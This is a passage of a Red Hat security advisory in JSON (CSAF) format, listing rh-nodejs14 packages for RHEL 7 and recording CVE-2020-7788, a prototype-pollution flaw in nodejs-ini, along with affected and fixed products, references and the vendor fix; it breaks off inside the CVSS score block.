"rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch" }, "product_reference": "rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch" }, "product_reference": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" }, "product_reference": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le" }, "product_reference": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x" }, "product_reference": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7)", "product_id": "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" }, "product_reference": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7-7.7.Z" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src" }, "product_reference": "rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch" }, "product_reference": "rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch" }, "product_reference": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" }, "product_reference": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le" }, "product_reference": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x" }, "product_reference": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" }, "product_reference": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src" }, "product_reference": "rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch" }, "product_reference": "rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch" }, "product_reference": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" }, "product_reference": "rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le" }, "product_reference": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x" }, "product_reference": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.7" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" }, "product_reference": "rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.7" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-7788", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-12-11T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1907444" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ini: Prototype pollution via malicious INI file", "title": "Vulnerability summary" }, { "category": "other", "text": "Node.JS packages in Red Hat Enterprise Linux and Red Hat Software Collections included the vulnerable dependency packaged in \"nodejs-npm\" component. Processing malicious files using npm could potentially trigger this vulnerability. The \"ini\" package bundled with npm was not in the library path where it could be included directly in other programs.\n\nThe nodejs-nodemon packages in Red Hat Enterprise Linux and Red Hat Software Collections are affected by this vulnerability as they bundle the nodejs-ini library. Usage of that library is governed by nodemon itself, so applications started by nodemon are not impacted. Further, nodemon is a developer tool not intended to be used in production.\n\nThe ini package is included in Red Hat Quay by protractor and webpack-cli, both of which are dev dependencies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ], "known_not_affected": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7788" }, { "category": "external", "summary": "RHBZ#1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7788", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7788" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" } ], "release_date": "2020-12-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:21:32+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3280" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": 